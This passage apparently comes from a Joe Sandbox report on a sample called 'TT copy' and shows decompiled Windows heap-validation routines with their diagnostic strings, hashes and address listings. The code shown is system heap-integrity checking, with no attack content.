                                                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                            						_push(_t104);
                                                                                                            						E0106B150();
                                                                                                            					} else {
                                                                                                            						E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            					}
                                                                                                            					E0106B150("Parameter2: %p\n",  *0x11558a8);
                                                                                                            				}
                                                                                                            				_t117 =  *0x11558ac; // 0x0
                                                                                                            				if(_t117 != 0) {
                                                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                            						_push(_t104);
                                                                                                            						E0106B150();
                                                                                                            					} else {
                                                                                                            						E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            					}
                                                                                                            					E0106B150("Parameter3: %p\n",  *0x11558ac);
                                                                                                            				}
                                                                                                            				_t119 =  *0x11558b0; // 0x0
                                                                                                            				if(_t119 != 0) {
                                                                                                            					L41:
                                                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                            						_push(_t104);
                                                                                                            						E0106B150();
                                                                                                            					} else {
                                                                                                            						E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            					}
                                                                                                            					_push( *0x11558b4);
                                                                                                            					E0106B150("Last known valid blocks: before - %p, after - %p\n",  *0x11558b0);
                                                                                                            				} else {
                                                                                                            					_t120 =  *0x11558b4; // 0x0
                                                                                                            					if(_t120 != 0) {
                                                                                                            						goto L41;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                            					_push(_t104);
                                                                                                            					E0106B150();
                                                                                                            				} else {
                                                                                                            					E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            				}
                                                                                                            				return E0106B150("Stack trace available at %p\n", 0x11558c0);
                                                                                                            			}












                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                            • API String ID: 0-2897834094
                                                                                                            • Opcode ID: 7a1bc0ae57f780f90c969ebe52e015fe316b5b9062b13854a3b78edf0efac8d7
                                                                                                            • Instruction ID: 3a0223f06f9f7d03a9865898aa89dcf1c51223142efa27ec01bb3d5a63359502
                                                                                                            • Opcode Fuzzy Hash: 7a1bc0ae57f780f90c969ebe52e015fe316b5b9062b13854a3b78edf0efac8d7
                                                                                                            • Instruction Fuzzy Hash: F761F8B7610169FFD36DEB4AD484D35B3A9EB0493474A807EF9899F301D72099A08F1A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 59%
                                                                                                            			E01124AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                            				signed int _v6;
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				signed int _v20;
                                                                                                            				signed int _v24;
                                                                                                            				signed int _v28;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				signed int _t189;
                                                                                                            				intOrPtr _t191;
                                                                                                            				intOrPtr _t210;
                                                                                                            				signed int _t225;
                                                                                                            				signed char _t231;
                                                                                                            				intOrPtr _t232;
                                                                                                            				unsigned int _t245;
                                                                                                            				intOrPtr _t249;
                                                                                                            				intOrPtr _t259;
                                                                                                            				signed int _t281;
                                                                                                            				signed int _t283;
                                                                                                            				intOrPtr _t284;
                                                                                                            				signed int _t288;
                                                                                                            				signed int* _t294;
                                                                                                            				signed int* _t298;
                                                                                                            				intOrPtr* _t299;
                                                                                                            				intOrPtr* _t300;
                                                                                                            				signed int _t307;
                                                                                                            				signed int _t309;
                                                                                                            				signed short _t312;
                                                                                                            				signed short _t315;
                                                                                                            				signed int _t317;
                                                                                                            				signed int _t320;
                                                                                                            				signed int _t322;
                                                                                                            				signed int _t326;
                                                                                                            				signed int _t327;
                                                                                                            				void* _t328;
                                                                                                            				signed int _t332;
                                                                                                            				signed int _t340;
                                                                                                            				signed int _t342;
                                                                                                            				signed char _t344;
                                                                                                            				signed int* _t345;
                                                                                                            				void* _t346;
                                                                                                            				signed char _t352;
                                                                                                            				signed char _t367;
                                                                                                            				signed int _t374;
                                                                                                            				intOrPtr* _t378;
                                                                                                            				signed int _t380;
                                                                                                            				signed int _t385;
                                                                                                            				signed char _t390;
                                                                                                            				unsigned int _t392;
                                                                                                            				signed char _t395;
                                                                                                            				unsigned int _t397;
                                                                                                            				intOrPtr* _t400;
                                                                                                            				signed int _t402;
                                                                                                            				signed int _t405;
                                                                                                            				intOrPtr* _t406;
                                                                                                            				signed int _t407;
                                                                                                            				intOrPtr _t412;
                                                                                                            				void* _t414;
                                                                                                            				signed int _t415;
                                                                                                            				signed int _t416;
                                                                                                            				signed int _t429;
                                                                                                            
                                                                                                            				_v16 = _v16 & 0x00000000;
                                                                                                            				_t189 = 0;
                                                                                                            				_v8 = _v8 & 0;
                                                                                                            				_t332 = __edx;
                                                                                                            				_v12 = 0;
                                                                                                            				_t414 = __ecx;
                                                                                                            				_t415 = __edx;
                                                                                                            				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
                                                                                                            					L88:
                                                                                                            					_t416 = _v16;
                                                                                                            					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
                                                                                                            						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
                                                                                                            						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
                                                                                                            							L107:
                                                                                                            							return 1;
                                                                                                            						}
                                                                                                            						_t191 =  *[fs:0x30];
                                                                                                            						__eflags =  *(_t191 + 0xc);
                                                                                                            						if( *(_t191 + 0xc) == 0) {
                                                                                                            							_push("HEAP: ");
                                                                                                            							E0106B150();
                                                                                                            						} else {
                                                                                                            							E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            						}
                                                                                                            						_push(_v12);
                                                                                                            						_push( *((intOrPtr*)(_t332 + 0x30)));
                                                                                                            						_push(_t332);
                                                                                                            						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
                                                                                                            						L122:
                                                                                                            						E0106B150();
                                                                                                            						L119:
                                                                                                            						return 0;
                                                                                                            					}
                                                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                            						_push("HEAP: ");
                                                                                                            						E0106B150();
                                                                                                            					} else {
                                                                                                            						E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            					}
                                                                                                            					_push(_t416);
                                                                                                            					_push( *((intOrPtr*)(_t332 + 0x2c)));
                                                                                                            					_push(_t332);
                                                                                                            					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
                                                                                                            					goto L122;
                                                                                                            				} else {
                                                                                                            					goto L1;
                                                                                                            				}
                                                                                                            				do {
                                                                                                            					L1:
                                                                                                            					 *_a16 = _t415;
                                                                                                            					if( *(_t414 + 0x4c) != 0) {
                                                                                                            						_t392 =  *(_t414 + 0x50) ^  *_t415;
                                                                                                            						 *_t415 = _t392;
                                                                                                            						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
                                                                                                            						_t424 = _t392 >> 0x18 - _t352;
                                                                                                            						if(_t392 >> 0x18 != _t352) {
                                                                                                            							_push(_t352);
                                                                                                            							E0111FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
                                                                                                            						_t210 =  *[fs:0x30];
                                                                                                            						__eflags =  *(_t210 + 0xc);
                                                                                                            						if( *(_t210 + 0xc) == 0) {
                                                                                                            							_push("HEAP: ");
                                                                                                            							E0106B150();
                                                                                                            						} else {
                                                                                                            							E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            						}
                                                                                                            						_push(_v8 & 0x0000ffff);
                                                                                                            						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
                                                                                                            						__eflags = _t340;
                                                                                                            						_push(_t340);
                                                                                                            						E0106B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
                                                                                                            						L117:
                                                                                                            						__eflags =  *(_t414 + 0x4c);
                                                                                                            						if( *(_t414 + 0x4c) != 0) {
                                                                                                            							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                                                                                            							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                                                            							__eflags =  *_t415;
                                                                                                            						}
                                                                                                            						goto L119;
                                                                                                            					}
                                                                                                            					_t225 =  *_t415 & 0x0000ffff;
                                                                                                            					_t390 =  *(_t415 + 2);
                                                                                                            					_t342 = _t225;
                                                                                                            					_v8 = _t342;
                                                                                                            					_v20 = _t342;
                                                                                                            					_v28 = _t225 << 3;
                                                                                                            					if((_t390 & 0x00000001) == 0) {
                                                                                                            						__eflags =  *(_t414 + 0x40) & 0x00000040;
                                                                                                            						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
                                                                                                            						__eflags = _t344 & 0x00000001;
                                                                                                            						if((_t344 & 0x00000001) == 0) {
                                                                                                            							L66:
                                                                                                            							_t345 = _a12;
                                                                                                            							 *_a8 =  *_a8 + 1;
                                                                                                            							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
                                                                                                            							__eflags =  *_t345;
                                                                                                            							L67:
                                                                                                            							_t231 =  *(_t415 + 6);
                                                                                                            							if(_t231 == 0) {
                                                                                                            								_t346 = _t414;
                                                                                                            							} else {
                                                                                                            								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
                                                                                                            							}
                                                                                                            							if(_t346 != _t332) {
                                                                                                            								_t232 =  *[fs:0x30];
                                                                                                            								__eflags =  *(_t232 + 0xc);
                                                                                                            								if( *(_t232 + 0xc) == 0) {
                                                                                                            									_push("HEAP: ");
                                                                                                            									E0106B150();
                                                                                                            								} else {
                                                                                                            									E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            								}
                                                                                                            								_push( *(_t415 + 6) & 0x000000ff);
                                                                                                            								_push(_t415);
                                                                                                            								_push("Heap block at %p has incorrect segment offset (%x)\n");
                                                                                                            								goto L95;
                                                                                                            							} else {
                                                                                                            								if( *((char*)(_t415 + 7)) != 3) {
                                                                                                            									__eflags =  *(_t414 + 0x4c);
                                                                                                            									if( *(_t414 + 0x4c) != 0) {
                                                                                                            										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                                                                            										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                                                            										__eflags =  *_t415;
                                                                                                            									}
                                                                                                            									_t415 = _t415 + _v28;
                                                                                                            									__eflags = _t415;
                                                                                                            									goto L86;
                                                                                                            								}
                                                                                                            								_t245 =  *(_t415 + 0x1c);
                                                                                                            								if(_t245 == 0) {
                                                                                                            									_t395 =  *_t415 & 0x0000ffff;
                                                                                                            									_v6 = _t395 >> 8;
                                                                                                            									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
                                                                                                            									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                                                                                            										__eflags =  *(_t414 + 0x4c);
                                                                                                            										if( *(_t414 + 0x4c) != 0) {
                                                                                                            											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
                                                                                                            											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                                                            											__eflags =  *_t415;
                                                                                                            										}
                                                                                                            										goto L107;
                                                                                                            									}
                                                                                                            									_t249 =  *[fs:0x30];
                                                                                                            									__eflags =  *(_t249 + 0xc);
                                                                                                            									if( *(_t249 + 0xc) == 0) {
                                                                                                            										_push("HEAP: ");
                                                                                                            										E0106B150();
                                                                                                            									} else {
                                                                                                            										E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            									}
                                                                                                            									_push( *((intOrPtr*)(_t332 + 0x28)));
                                                                                                            									_push(_t415);
                                                                                                            									_push("Heap block at %p is not last block in segment (%p)\n");
                                                                                                            									L95:
                                                                                                            									E0106B150();
                                                                                                            									goto L117;
                                                                                                            								}
                                                                                                            								_v12 = _v12 + 1;
                                                                                                            								_v16 = _v16 + (_t245 >> 0xc);
                                                                                                            								if( *(_t414 + 0x4c) != 0) {
                                                                                                            									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                                                                            									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                                                            								}
                                                                                                            								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
                                                                                                            								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                                                                                            									L82:
                                                                                                            									_v8 = _v8 & 0x00000000;
                                                                                                            									goto L86;
                                                                                                            								} else {
                                                                                                            									if( *(_t414 + 0x4c) != 0) {
                                                                                                            										_t397 =  *(_t414 + 0x50) ^  *_t415;
                                                                                                            										 *_t415 = _t397;
                                                                                                            										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
                                                                                                            										_t442 = _t397 >> 0x18 - _t367;
                                                                                                            										if(_t397 >> 0x18 != _t367) {
                                                                                                            											_push(_t367);
                                                                                                            											E0111FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
                                                                                                            										}
                                                                                                            									}
                                                                                                            									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
                                                                                                            										_t259 =  *[fs:0x30];
                                                                                                            										__eflags =  *(_t259 + 0xc);
                                                                                                            										if( *(_t259 + 0xc) == 0) {
                                                                                                            											_push("HEAP: ");
                                                                                                            											E0106B150();
                                                                                                            										} else {
                                                                                                            											E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            										}
                                                                                                            										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
                                                                                                            										_push(_t415);
                                                                                                            										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
                                                                                                            										goto L95;
                                                                                                            									} else {
                                                                                                            										if( *(_t414 + 0x4c) != 0) {
                                                                                                            											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                                                                                            											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                                                            										}
                                                                                                            										goto L82;
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t281 = _v28 + 0xfffffff0;
                                                                                                            						_v24 = _t281;
                                                                                                            						__eflags = _t390 & 0x00000002;
                                                                                                            						if((_t390 & 0x00000002) != 0) {
                                                                                                            							__eflags = _t281 - 4;
                                                                                                            							if(_t281 > 4) {
                                                                                                            								_t281 = _t281 - 4;
                                                                                                            								__eflags = _t281;
                                                                                                            								_v24 = _t281;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						__eflags = _t390 & 0x00000008;
                                                                                                            						if((_t390 & 0x00000008) == 0) {
                                                                                                            							_t102 = _t415 + 0x10; // -8
                                                                                                            							_t283 = E010BD540(_t102, _t281, 0xfeeefeee);
                                                                                                            							_v20 = _t283;
                                                                                                            							__eflags = _t283 - _v24;
                                                                                                            							if(_t283 != _v24) {
                                                                                                            								_t284 =  *[fs:0x30];
                                                                                                            								__eflags =  *(_t284 + 0xc);
                                                                                                            								if( *(_t284 + 0xc) == 0) {
                                                                                                            									_push("HEAP: ");
                                                                                                            									E0106B150();
                                                                                                            								} else {
                                                                                                            									E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            								}
                                                                                                            								_t288 = _v20 + 8 + _t415;
                                                                                                            								__eflags = _t288;
                                                                                                            								_push(_t288);
                                                                                                            								_push(_t415);
                                                                                                            								_push("Free Heap block %p modified at %p after it was freed\n");
                                                                                                            								goto L95;
                                                                                                            							}
                                                                                                            							goto L66;
                                                                                                            						} else {
                                                                                                            							_t374 =  *(_t415 + 8);
                                                                                                            							_t400 =  *((intOrPtr*)(_t415 + 0xc));
                                                                                                            							_v24 = _t374;
                                                                                                            							_v28 = _t400;
                                                                                                            							_t294 =  *(_t374 + 4);
                                                                                                            							__eflags =  *_t400 - _t294;
                                                                                                            							if( *_t400 != _t294) {
                                                                                                            								L64:
                                                                                                            								_push(_t374);
                                                                                                            								_push( *_t400);
                                                                                                            								_t101 = _t415 + 8; // -16
                                                                                                            								E0112A80D(_t414, 0xd, _t101, _t294);
                                                                                                            								goto L86;
                                                                                                            							}
                                                                                                            							_t56 = _t415 + 8; // -16
                                                                                                            							__eflags =  *_t400 - _t56;
                                                                                                            							_t374 = _v24;
                                                                                                            							if( *_t400 != _t56) {
                                                                                                            								goto L64;
                                                                                                            							}
                                                                                                            							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
                                                                                                            							_t402 =  *(_t414 + 0xb4);
                                                                                                            							__eflags = _t402;
                                                                                                            							if(_t402 == 0) {
                                                                                                            								L35:
                                                                                                            								_t298 = _v28;
                                                                                                            								 *_t298 = _t374;
                                                                                                            								 *(_t374 + 4) = _t298;
                                                                                                            								__eflags =  *(_t415 + 2) & 0x00000008;
                                                                                                            								if(( *(_t415 + 2) & 0x00000008) == 0) {
                                                                                                            									L39:
                                                                                                            									_t377 =  *_t415 & 0x0000ffff;
                                                                                                            									_t299 = _t414 + 0xc0;
                                                                                                            									_v28 =  *_t415 & 0x0000ffff;
                                                                                                            									 *(_t415 + 2) = 0;
                                                                                                            									 *((char*)(_t415 + 7)) = 0;
                                                                                                            									__eflags =  *(_t414 + 0xb4);
                                                                                                            									if( *(_t414 + 0xb4) == 0) {
                                                                                                            										_t378 =  *_t299;
                                                                                                            									} else {
                                                                                                            										_t378 = E0108E12C(_t414, _t377);
                                                                                                            										_t299 = _t414 + 0xc0;
                                                                                                            									}
                                                                                                            									__eflags = _t299 - _t378;
                                                                                                            									if(_t299 == _t378) {
                                                                                                            										L51:
                                                                                                            										_t300 =  *((intOrPtr*)(_t378 + 4));
                                                                                                            										__eflags =  *_t300 - _t378;
                                                                                                            										if( *_t300 != _t378) {
                                                                                                            											_push(_t378);
                                                                                                            											_push( *_t300);
                                                                                                            											__eflags = 0;
                                                                                                            											E0112A80D(0, 0xd, _t378, 0);
                                                                                                            										} else {
                                                                                                            											_t87 = _t415 + 8; // -16
                                                                                                            											_t406 = _t87;
                                                                                                            											 *_t406 = _t378;
                                                                                                            											 *((intOrPtr*)(_t406 + 4)) = _t300;
                                                                                                            											 *_t300 = _t406;
                                                                                                            											 *((intOrPtr*)(_t378 + 4)) = _t406;
                                                                                                            										}
                                                                                                            										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
                                                                                                            										_t405 =  *(_t414 + 0xb4);
                                                                                                            										__eflags = _t405;
                                                                                                            										if(_t405 == 0) {
                                                                                                            											L61:
                                                                                                            											__eflags =  *(_t414 + 0x4c);
                                                                                                            											if(__eflags != 0) {
                                                                                                            												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                                                                            												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                                                            											}
                                                                                                            											goto L86;
                                                                                                            										} else {
                                                                                                            											_t380 =  *_t415 & 0x0000ffff;
                                                                                                            											while(1) {
                                                                                                            												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
                                                                                                            												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
                                                                                                            													break;
                                                                                                            												}
                                                                                                            												_t307 =  *_t405;
                                                                                                            												__eflags = _t307;
                                                                                                            												if(_t307 == 0) {
                                                                                                            													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
                                                                                                            													L60:
                                                                                                            													_t94 = _t415 + 8; // -16
                                                                                                            													E0108E4A0(_t414, _t405, 1, _t94, _t309, _t380);
                                                                                                            													goto L61;
                                                                                                            												}
                                                                                                            												_t405 = _t307;
                                                                                                            											}
                                                                                                            											_t309 = _t380;
                                                                                                            											goto L60;
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										_t407 =  *(_t414 + 0x4c);
                                                                                                            										while(1) {
                                                                                                            											__eflags = _t407;
                                                                                                            											if(_t407 == 0) {
                                                                                                            												_t312 =  *(_t378 - 8) & 0x0000ffff;
                                                                                                            											} else {
                                                                                                            												_t315 =  *(_t378 - 8);
                                                                                                            												_t407 =  *(_t414 + 0x4c);
                                                                                                            												__eflags = _t315 & _t407;
                                                                                                            												if((_t315 & _t407) != 0) {
                                                                                                            													_t315 = _t315 ^  *(_t414 + 0x50);
                                                                                                            													__eflags = _t315;
                                                                                                            												}
                                                                                                            												_t312 = _t315 & 0x0000ffff;
                                                                                                            											}
                                                                                                            											__eflags = _v28 - (_t312 & 0x0000ffff);
                                                                                                            											if(_v28 <= (_t312 & 0x0000ffff)) {
                                                                                                            												goto L51;
                                                                                                            											}
                                                                                                            											_t378 =  *_t378;
                                                                                                            											__eflags = _t414 + 0xc0 - _t378;
                                                                                                            											if(_t414 + 0xc0 != _t378) {
                                                                                                            												continue;
                                                                                                            											}
                                                                                                            											goto L51;
                                                                                                            										}
                                                                                                            										goto L51;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								_t317 = E0108A229(_t414, _t415);
                                                                                                            								__eflags = _t317;
                                                                                                            								if(_t317 != 0) {
                                                                                                            									goto L39;
                                                                                                            								}
                                                                                                            								E0108A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
                                                                                                            								goto L86;
                                                                                                            							}
                                                                                                            							_t385 =  *_t415 & 0x0000ffff;
                                                                                                            							while(1) {
                                                                                                            								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
                                                                                                            								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								_t320 =  *_t402;
                                                                                                            								__eflags = _t320;
                                                                                                            								if(_t320 == 0) {
                                                                                                            									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
                                                                                                            									L34:
                                                                                                            									_t63 = _t415 + 8; // -16
                                                                                                            									E0108BC04(_t414, _t402, 1, _t63, _t322, _t385);
                                                                                                            									_t374 = _v24;
                                                                                                            									goto L35;
                                                                                                            								}
                                                                                                            								_t402 = _t320;
                                                                                                            							}
                                                                                                            							_t322 = _t385;
                                                                                                            							goto L34;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if(_a20 == 0) {
                                                                                                            						L18:
                                                                                                            						if(( *(_t415 + 2) & 0x00000004) == 0) {
                                                                                                            							goto L67;
                                                                                                            						}
                                                                                                            						if(E011123E3(_t414, _t415) == 0) {
                                                                                                            							goto L117;
                                                                                                            						}
                                                                                                            						goto L67;
                                                                                                            					} else {
                                                                                                            						if((_t390 & 0x00000002) == 0) {
                                                                                                            							_t326 =  *(_t415 + 3) & 0x000000ff;
                                                                                                            						} else {
                                                                                                            							_t328 = E01061F5B(_t415);
                                                                                                            							_t342 = _v20;
                                                                                                            							_t326 =  *(_t328 + 2) & 0x0000ffff;
                                                                                                            						}
                                                                                                            						_t429 = _t326;
                                                                                                            						if(_t429 == 0) {
                                                                                                            							goto L18;
                                                                                                            						}
                                                                                                            						if(_t429 >= 0) {
                                                                                                            							__eflags = _t326 & 0x00000800;
                                                                                                            							if(__eflags != 0) {
                                                                                                            								goto L18;
                                                                                                            							}
                                                                                                            							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
                                                                                                            							if(__eflags >= 0) {
                                                                                                            								goto L18;
                                                                                                            							}
                                                                                                            							_t412 = _a20;
                                                                                                            							_t327 = _t326 & 0x0000ffff;
                                                                                                            							L17:
                                                                                                            							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
                                                                                                            							goto L18;
                                                                                                            						}
                                                                                                            						_t327 = _t326 & 0x00007fff;
                                                                                                            						if(_t327 >= 0x81) {
                                                                                                            							goto L18;
                                                                                                            						}
                                                                                                            						_t412 = _a24;
                                                                                                            						goto L17;
                                                                                                            					}
                                                                                                            					L86:
                                                                                                            				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
                                                                                                            				_t189 = _v12;
                                                                                                            				goto L88;
                                                                                                            			}
                                                                                                            0x01124cc1
                                                                                                            0x01124cc7
                                                                                                            0x01124cdc
                                                                                                            0x01124cc9
                                                                                                            0x01124cd2
                                                                                                            0x01124cd4
                                                                                                            0x01124cd4
                                                                                                            0x01124cde
                                                                                                            0x01124ce0
                                                                                                            0x01124d13
                                                                                                            0x01124d13
                                                                                                            0x01124d16
                                                                                                            0x01124d18
                                                                                                            0x01124d29
                                                                                                            0x01124d2a
                                                                                                            0x01124d2c
                                                                                                            0x01124d34
                                                                                                            0x01124d1a
                                                                                                            0x01124d1a
                                                                                                            0x01124d1a
                                                                                                            0x01124d1d
                                                                                                            0x01124d1f
                                                                                                            0x01124d22
                                                                                                            0x01124d24
                                                                                                            0x01124d24
                                                                                                            0x01124d3c
                                                                                                            0x01124d3f
                                                                                                            0x01124d45
                                                                                                            0x01124d47
                                                                                                            0x01124d6c
                                                                                                            0x01124d6c
                                                                                                            0x01124d70
                                                                                                            0x01124d7e
                                                                                                            0x01124d84
                                                                                                            0x01124d84
                                                                                                            0x00000000
                                                                                                            0x01124d49
                                                                                                            0x01124d49
                                                                                                            0x01124d56
                                                                                                            0x01124d56
                                                                                                            0x01124d59
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124d4e
                                                                                                            0x01124d50
                                                                                                            0x01124d52
                                                                                                            0x01124d8e
                                                                                                            0x01124d5d
                                                                                                            0x01124d5f
                                                                                                            0x01124d67
                                                                                                            0x00000000
                                                                                                            0x01124d67
                                                                                                            0x01124d54
                                                                                                            0x01124d54
                                                                                                            0x01124d5b
                                                                                                            0x00000000
                                                                                                            0x01124d5b
                                                                                                            0x01124ce2
                                                                                                            0x01124ce2
                                                                                                            0x01124ce5
                                                                                                            0x01124ce5
                                                                                                            0x01124ce7
                                                                                                            0x01124cfb
                                                                                                            0x01124ce9
                                                                                                            0x01124ce9
                                                                                                            0x01124cec
                                                                                                            0x01124cef
                                                                                                            0x01124cf1
                                                                                                            0x01124cf3
                                                                                                            0x01124cf3
                                                                                                            0x01124cf3
                                                                                                            0x01124cf6
                                                                                                            0x01124cf6
                                                                                                            0x01124d02
                                                                                                            0x01124d05
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124d07
                                                                                                            0x01124d0f
                                                                                                            0x01124d11
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124d11
                                                                                                            0x00000000
                                                                                                            0x01124ce5
                                                                                                            0x01124ce0
                                                                                                            0x01124c8a
                                                                                                            0x01124c8f
                                                                                                            0x01124c91
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124c9d
                                                                                                            0x00000000
                                                                                                            0x01124c9d
                                                                                                            0x01124c52
                                                                                                            0x01124c5f
                                                                                                            0x01124c5f
                                                                                                            0x01124c62
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124c57
                                                                                                            0x01124c59
                                                                                                            0x01124c5b
                                                                                                            0x01124caa
                                                                                                            0x01124c66
                                                                                                            0x01124c68
                                                                                                            0x01124c70
                                                                                                            0x01124c75
                                                                                                            0x00000000
                                                                                                            0x01124c75
                                                                                                            0x01124c5d
                                                                                                            0x01124c5d
                                                                                                            0x01124c64
                                                                                                            0x00000000
                                                                                                            0x01124c64
                                                                                                            0x01124c17
                                                                                                            0x01124b75
                                                                                                            0x01124bc4
